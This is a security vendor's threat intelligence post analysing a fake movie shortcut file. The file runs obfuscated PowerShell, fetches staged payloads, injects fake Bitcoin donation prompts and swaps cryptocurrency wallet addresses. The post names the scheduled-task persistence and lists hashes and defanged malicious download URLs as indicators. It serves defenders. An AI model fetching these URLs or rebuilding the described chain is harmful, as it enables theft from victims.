Ryan MurphyCARBONBLACK:88D0E22AEC73763DA2CFC04B17A18815TAU Threat Intelligence Notification – Fake Movie File Attack Targeting Cryptocurrency
A malicious Windows shortcut file is posing as a movie available on a torrent site - its payload is used to conduct web-injection, ultimately targeting victim’s web searches in browsers like Chrome, Firefox and Internet Explorer. The payload has the ability to search for and steal cryptocurrency located on the victim’s system.
Figure 1: .LNK Windows shortcut file with malicious PowerShell
The attack is initiated by the PowerShell command that listed in the Target field in windows shortcut file (observed in the image above). The image below shows the PowerShell command in its entirety.
Figure 2: Malicious PowerShell from .LNK
The command it obfuscated by storing the method type and C2 in a decimal encoded array.
It will then download the rest of the PowerShell payload via shorten URLs which redirect to pastebin. The final stage is the web-inject and cryptocurrency stealer component which will be downloaded onto the system. The payload will create a scheduled task named “Smart Monitoring” as persistence mechanism.
Figure 3 : Before web injection
Figure 4: After web injection
These 2 images above demonstrate the result of the web injected browser content. In this scenario it will inject a fake Wikipedia donation message box on the infected machines’ browser. The code will also manipulate the user search engine result.
_ 
Figure 5: Fake Wikipedia donation Bitcoin wallet address
The above image shows the Bitcoin ‘donation’ being transferred from the fake Wikipedia donation bitcoin address. At the time of this blog post, it value of the account was $27 (USD).
Figure 6: JavaScript injected in browser to replace Bitcoin and Ethereum address
In addition to the web injection and web search result poisoning, the malware will monitor web pages for Bitcoin and Ethereum addresses and replace the wallet addresses to one controlled by the attackers. The image above shows a portion of the code responsible for the wallet address replacement.
Figure 7: Threat actor’s Stikked page
The image above showed the attack has at least carry on for a month and the PowerShell script from has been downloaded more that 21000 times.
If you are a Carbon Black customer and looking for more information on how CB products defend against this attack, click here.
Indicators of Compromise (IOCs)
Indicator
|
Type
|
Context
—|—|—
3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5
5d357f666e7727b18f8150d53d28d257
|
SHA256
MD5
|
LNK Sample
094b703ae10cc35826aa30f7f57ab39cad571459a922721a48113a4536c92a02
12fe26e33008d89783088e130bb76ded
|
SHA256
MD5
|
Web injector
hxxp://klis.icu/1
|
URL
|
Stage 1 Powershell
hxxp://klis.icu/2
|
URL
|
Stage 2 Powershell
hxxp://klis.icu/3
|
URL
|
Stage 3 Powershell
hxxps://pastebin.com/raw/GbDcvb9u
|
URL
|
Stage 1 Powershell
hxxps://pastebin.com/raw/jqZ8XC6D
|
URL
|
Stage 2 Powershell
hxxps://pastebin.com/raw/inuZ4RrV
|
URL
|
Stage 3 Powershell
hxxp://qgb.us/view/raw/76d115b1
|
URL
|
Dropper Link
hxxp://qgb.us/view/raw/41cd6acf
|
URL
|
Dropper Link
|
URL
|
C2
The post TAU Threat Intelligence Notification - Fake Movie File Attack Targeting Cryptocurrency appeared first on Carbon Black.